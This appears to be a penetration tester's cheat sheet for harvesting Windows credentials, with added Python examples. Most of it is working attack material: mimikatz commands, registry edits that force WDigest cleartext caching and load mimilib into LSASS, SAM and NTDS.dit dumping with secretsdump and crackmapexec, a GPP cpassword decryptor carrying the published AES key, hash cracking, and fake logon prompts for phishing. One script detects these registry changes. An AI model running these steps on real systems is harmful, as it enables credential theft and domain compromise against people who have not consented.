Saved WLAN profiles are XML files under C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\<interface GUID>\<profile GUID>.xml (the keyMaterial stored there is DPAPI-protected, so read the cleartext with netsh as a local admin)
get profile names with
netsh wlan show profiles
then
netsh wlan show profile name=<SSID NAME> key=clear
password is in the "Key Content" field
lazagne.exe wifi
in meterpreter>
getsystem
load kiwi
wifi_list_shared
use post/windows/wlan/wlan_profile
GPP config files are stored in \\<DC>\SYSVOL\<DOMAIN>\Policies\{<GPO GUID>}\ (readable by every domain user)
to set it up on a Windows server: in Group Policy Management create a new GPO linked to the domain, then Computer Configuration > Preferences > Control Panel Settings > Local Users and Groups > right click > New > Local User, set name + password, and don't forget to run gpupdate on a client (the password ends up in Groups.xml as a cpassword attribute)
same thing from MSF: auxiliary/scanner/smb/smb_enum_gpp (set rhosts, smbuser, smbpass, run), or post/windows/gather/credentials/gpp from an existing session
smbclient //<IP>/SYSVOL -U <user>
then look for Groups.xml at \sysvol\<box.local>\Policies\{<GPO GUID>}\Machine\Preferences\Groups\Groups.xml (Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml can carry a cpassword too) and decrypt the cpassword attribute with gpp-decrypt <cpassword>
or GP3finder.exe -D
or
powershell-empire
agents
use module privesc/gpp
execute
or
Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword
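Added example, not part of the original notes and not the code of gpp-decrypt or Get-GPPPassword: walk a copied SYSVOL Policies tree, pull every cpassword out of the preference XML files, and decrypt it with the AES-256 key Microsoft published in MS-GPPREF (the same key on every domain, which is why this works). The Groups.xml inside is constructed (clsid/uid attributes trimmed) and its cpassword is the sample value that circulates in GPP write-ups, not a real secret; the decrypt step assumes the `cryptography` package is installed.

```python
# Added example, not part of the original notes.
import base64
import xml.etree.ElementTree as ET
from pathlib import Path

# AES-256 key Microsoft published in MS-GPPREF; identical in every domain.
# MS14-025 stopped new passwords being set this way but left existing ones in SYSVOL.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# Preference XML files that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample Groups.xml; the cpassword is the sample value seen in
# GPP write-ups, not a real secret.
SAMPLE_GROUPS_XML = b"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" image="2" changed="2019-10-11 14:05:36">
    <Properties action="C" fullName="" description=""
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="LocalAdmin"/>
  </User>
</Groups>
"""


def fix_base64_padding(value: str) -> str:
    """GPP strips the '=' padding from cpassword; restore it before decoding."""
    return value + "=" * (-len(value) % 4)


def cpassword_bytes(cpassword: str) -> bytes:
    """base64 -> raw AES-CBC ciphertext (always a multiple of 16 bytes)."""
    return base64.b64decode(fix_base64_padding(cpassword))


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC, zero IV, PKCS#7 padding, UTF-16LE plaintext.
    Needs the `cryptography` package (assumption of this example)."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(bytes(16))).decryptor()
    plain = dec.update(cpassword_bytes(cpassword)) + dec.finalize()
    return plain[:-plain[-1]].decode("utf-16-le")


def find_cpasswords(xml_data, source="<inline>") -> list:
    """Every cpassword in one preference file, with the account it belongs to."""
    hits = []
    for el in ET.fromstring(xml_data).iter():
        cp = el.get("cpassword")
        if cp:
            # Attribute naming differs per file: userName (Groups/Drives), accountName
            # (Services), runAs (ScheduledTasks), username (DataSources/Printers).
            who = next((el.get(a) for a in ("userName", "accountName", "runAs", "username") if el.get(a)), "?")
            hits.append({"source": source, "element": el.tag, "account": who, "cpassword": cp})
    return hits


def walk_policies(policies_dir) -> list:
    """Walk a mounted or copied SYSVOL\\<domain>\\Policies tree for all GPP secrets."""
    hits = []
    for path in Path(policies_dir).rglob("*.xml"):
        if path.name in GPP_FILES:
            hits.extend(find_cpasswords(path.read_bytes(), str(path)))
    return hits


if __name__ == "__main__":
    for hit in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        try:
            print(f"{hit['source']}: {hit['account']} -> {decrypt_cpassword(hit['cpassword'])}")
        except ImportError:
            print(f"{hit['source']}: {hit['account']} cpassword={hit['cpassword']} (pip install cryptography to decrypt)")
```

After `smbclient //<IP>/SYSVOL -U <user>` and a recursive get of Policies, walk_policies("Policies") returns every hit across all six file types, not just Groups.xml.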
LaZagne from a meterpreter session: upload lazagne.exe (or drop to shell and wget <URL>/lazagne.exe if wget is available), then
shell dir
shell lazagne.exe all
it runs as the current user and prints every password it can find
load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials
> mimikatz
privilege::debug
sekurlsa::wdigest
if nothing comes back (Windows 8.1 / Server 2012 R2 and later don't cache WDigest creds by default), set UseLogonCredential = 1:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
no reboot or gpupdate needed, but only logons made after the change are cached, so lock the screen or wait for the user to log in again, then
privilege::debug
sekurlsa::wdigest
Import-Module .\WdigestDowngrade.ps1
Invoke-WdigestDowngrade
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential   (confirm the value stuck)
then get invoke-mimikatz.ps1 from powersploit
Invoke-Mimikatz -DumpCreds
reg enumkey -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest
load powershell
powershell_import /root/Desktop/Invoke-WdigestDowngrade.ps1
powershell_execute Invoke-WDigestDowngrade
powershell_import Invoke-Mimikatz.ps1
powershell_execute Invoke-Mimikatz -DumpCreds
use post/windows/manage/wdigest_caching
load kiwi
creds_wdigest
usemodule management/wdigest_downgrade
run
usemodule credentials/mimikatz/command
set Command sekurlsa::wdigest
run
crackmapexec smb <IP> -u "Administrator" -p "sweetpasswd" -M wdigest -o ACTION=enable
config at: HKLM\SYSTEM\CurrentControlSet\Control\Lsa (value "Security Packages", REG_MULTI_SZ; every DLL listed is loaded into LSASS at boot)
check for security packages via PS
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
add mimilib with (this overwrites the whole list, so keep the existing entries from the query; mimilib.dll has to be copied to C:\Windows\System32 first):
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f
after reboot this file will be created
type C:\Windows\System32\kiwissp.log
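Added example, not part of the original notes: a defender-side (or post-exploitation self-check) parser for `reg query` output that flags both registry changes above, the WDigest UseLogonCredential=1 switch and a foreign DLL in Security Packages. The reg query text inside is constructed; the list of expected SSPs is an assumption for a default Windows 10 / Server 2016 build and should be baselined against a known-good host.

```python
# Added example, not part of the original notes.
import re

WDIGEST_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
LSA_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa"

# Assumption: packages present on a clean Windows 10 / Server 2016 install.
# "" is included because the default data on those builds is a single empty string.
EXPECTED_SSPS = {"", "kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u", "cloudap"}

# Constructed `reg query` output from a box where both tricks were applied.
SAMPLE_WDIGEST = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
    UseLogonCredential    REG_DWORD    0x1
"""
SAMPLE_WDIGEST_CLEAN = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
"""
SAMPLE_LSA = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib
    Authentication Packages    REG_MULTI_SZ    msv1_0
"""
SAMPLE_LSA_CLEAN = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
    Authentication Packages    REG_MULTI_SZ    msv1_0
"""


def parse_reg_query(output: str) -> dict:
    """Map value name -> (type, data) from `reg query <key>` text output."""
    values = {}
    for line in output.splitlines():
        if not line.startswith(" "):
            continue  # key path or blank line
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) < 2 or not parts[1].startswith("REG_"):
            continue
        values[parts[0]] = (parts[1], parts[2] if len(parts) == 3 else "")
    return values


def check_wdigest(wdigest_output: str) -> list:
    """Flag UseLogonCredential=1 (cleartext creds cached in LSASS on Win 8.1 / 2012 R2+)."""
    typ, data = parse_reg_query(wdigest_output).get("UseLogonCredential", ("", ""))
    if typ == "REG_DWORD" and int(data, 16) == 1:
        return [f"{WDIGEST_KEY}: UseLogonCredential=1 (WDigest downgrade)"]
    return []


def check_security_packages(lsa_output: str) -> list:
    """Flag any SSP name not in the baseline; reg query separates multi-sz entries with \\0."""
    typ, data = parse_reg_query(lsa_output).get("Security Packages", ("", ""))
    if typ != "REG_MULTI_SZ":
        return []
    return [f"{LSA_KEY}: unexpected SSP '{pkg}' in Security Packages (loaded into LSASS at boot)"
            for pkg in data.split(r"\0") if pkg.strip().lower() not in EXPECTED_SSPS]


def live_findings() -> list:
    """On Windows, run the two reg queries for real; returns [] elsewhere."""
    import os, subprocess
    if os.name != "nt":
        return []
    query = lambda key: subprocess.run(["reg", "query", key], capture_output=True, text=True).stdout
    return check_wdigest(query(WDIGEST_KEY)) + check_security_packages(query(LSA_KEY))


if __name__ == "__main__":
    for finding in check_wdigest(SAMPLE_WDIGEST) + check_security_packages(SAMPLE_LSA) + live_findings():
        print("[!]", finding)
```

A hit on Security Packages is only half the story: the listed DLL still has to exist in System32, so pair the finding with a file check and a look for kiwissp.log.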
mimikatz to dump em
privilege::debug
misc::memssp
check log
type C:\Windows\System32\mimilsa.log
in msf
load kiwi
kiwi_cmd misc::memssp
now lock the screen so the victim has to type the password again and it lands in the log
shell
RunDll32.exe user32.dll,LockWorkStation
koadic also has mimikatz functionality; once you have a session:
use mimikatz_dynwrapx
set MIMICMD misc::memssp
cmdshell 0
RunDll32.exe user32.dll,LockWorkStation
type mimilsa.log
in empire
usemodule persistence/misc/memssp
execute
usemodule management/lock
execute
type C:\Windows\System32\mimilsa.log
normal way: serve mimikatz.exe with updog, upload it to the box, run the same commands
SAM hive is at C:\Windows\System32\config\SAM (locked while Windows runs) and mapped in the registry at HKEY_LOCAL_MACHINE\SAM; the SYSTEM hive is needed too for the bootkey
dump live with PwDump7.exe
or save both hives and extract offline
reg save hklm\sam c:\sam
reg save hklm\system c:\system
then samdump2 system sam
Invoke-PowerDump script (download it first)
MSF + PS
powershell_import /root/powershell/Invoke-PowerDump.ps1
powershell_execute Invoke-PowerDump
another way
powershell_import /root/powershell/Get-PassHashes.ps1
powershell_execute Get-PassHashes
from a local PowerShell (good for internal tests): Import-Module <path to Invoke-PowerDump.ps1>; Invoke-PowerDump
via mimikatz
privilege::debug
token::elevate
lsadump::sam
Impacket
./secretsdump.py -sam /root/Desktop/sam -system /root/Desktop/system LOCAL
MSF
use post/windows/gather/hashdump
or
use post/windows/gather/credentials/credential_collector
or
load kiwi
lsa_dump_sam
KOADIC
use hashdump_sam
EMPIRE
usemodule credentials/mimikatz/sam*
Lazagne
lazagne.exe all
CME
crackmapexec smb <IP> -u '<Username>' -p '<Password>' --sam
e.g. crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --sam
then
john --format=NT <hashfile>, then john --format=NT <hashfile> --show to print the cracked ones
empire
usemodule credentials/sessiongopher
via CoreFTP server
pass at: HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites
msf: use post/windows/gather/credentials/coreftp
FTP Navigator
use post/windows/gather/credentials/ftpnavigator
FileZilla
use post/multi/gather/filezilla_client_cred
HeidiSQL
use post/windows/gather/credentials/heidisql
also modules for
VNC
WINSCP
many more
NTDS.dit is at C:\Windows\NTDS\ntds.dit (locked while AD runs; the SYSTEM hive is needed for the bootkey)
dump via: fgdump.exe
or take a shadow copy with ntdsutil:
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"   (writes c:\temp\Active Directory\ntds.dit and c:\temp\registry\SYSTEM)
./secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
with PS
Save-Module DSInternals -Path C:\Windows\System32\WindowsPowerShell\v1.0\Modules
Set-ExecutionPolicy Unrestricted
Import-Module DSInternals
Get-BootKey -SystemHivePath 'C:\SYSTEM'
Get-ADDBAccount -All -DBPath 'C:\ntds.dit' -Bootkey <bootkey value>
with NTDSDumpEx.exe
NTDSDumpEx.exe -d C:\ntds.dit -s C:\SYSTEM
with msf
use post/windows/gather/ntds_location
or
use post/windows/gather/ntds_grabber
or
cabextract <cab filename>
use auxiliary/scanner/smb/impacket/secretsdump
set rhosts 192.168.1.108
set smbuser administrator
set smbpass Ignite@987
exploit
cme
crackmapexec smb <IP> -u '<Username>' -p '<Password>' --ntds drsuapi
e.g. crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds drsuapi
john --format=NT <hashfile>, then john --format=NT <hashfile> --show to print the cracked ones
use post/windows/gather/phish_windows_credentials
FakeLogonScreen.exe
SharpLocker.exe
EMPIRE
usemodule collection/toasted
KOADIC:
use password_box
execute
PS
Import-Module C:\Users\raj\Desktop\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish
Import-Module C:\Users\raj\Desktop\Invoke-LoginPrompt.ps1
Invoke-LoginPrompt
lockphish.sh